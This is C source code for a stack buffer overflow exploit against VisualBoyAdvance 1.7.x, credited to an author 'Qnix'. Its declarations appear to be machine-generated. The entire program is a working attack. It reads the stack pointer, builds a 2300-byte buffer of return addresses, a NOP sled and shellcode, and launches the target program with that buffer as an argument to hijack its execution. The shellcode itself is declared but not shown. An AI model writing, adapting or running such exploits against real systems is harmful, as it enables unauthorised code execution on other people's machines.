
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int execl (char*,char*,char*,int ) ;
 int free (char*) ;
 char* malloc (int) ;
 int printf (char*,...) ;
 int * shellcode ;
 long sp () ;
 int strlen (int *) ;

int main(int argc, char *argv[])
{
  int i, offset;
  long esp, ret, *addr_ptr;
  char *buffer, *ptr;

  offset = 0;
  esp = sp();
  ret = esp - offset;

if (argc >= 2) {
printf("\n ************************************************ \n");
printf(" VisualBoyAdvanced 1.7.x BufferOver Flow exploit \n");
printf("            by Qnix[at]bsdmail[dot]org      ");
printf("\n ************************************************ \n\n");
printf("[~] Stack pointer (ESP) : 0x%x\n", esp);
printf("[~] Offset from ESP     : 0x%x\n", offset);
printf("[~] Desired Return Addr : 0x%x\n\n", ret);
} else {
printf("\n ************************************************ \n");
printf(" VisualBoyAdvanced 1.7.x BufferOver Flow Exploit \n");
printf("            by Qnix[at]bsdmail[dot]org      ");
printf("\n ************************************************ \n\n");
printf("useage : ./vba-exp <VisualBoyAdvanced File> \n\n");
}

buffer = malloc(2300);

ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 2300; i+=4)
{ *(addr_ptr++) = ret; }

for(i=0; i < 1900; i++)
{ buffer[i] = '\x90'; }

ptr = buffer + 1900;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }

buffer[2300-1] = 0;

execl(argv[1],"VisualBoyAdvance",buffer,0);

free(buffer);

  return 0;
}
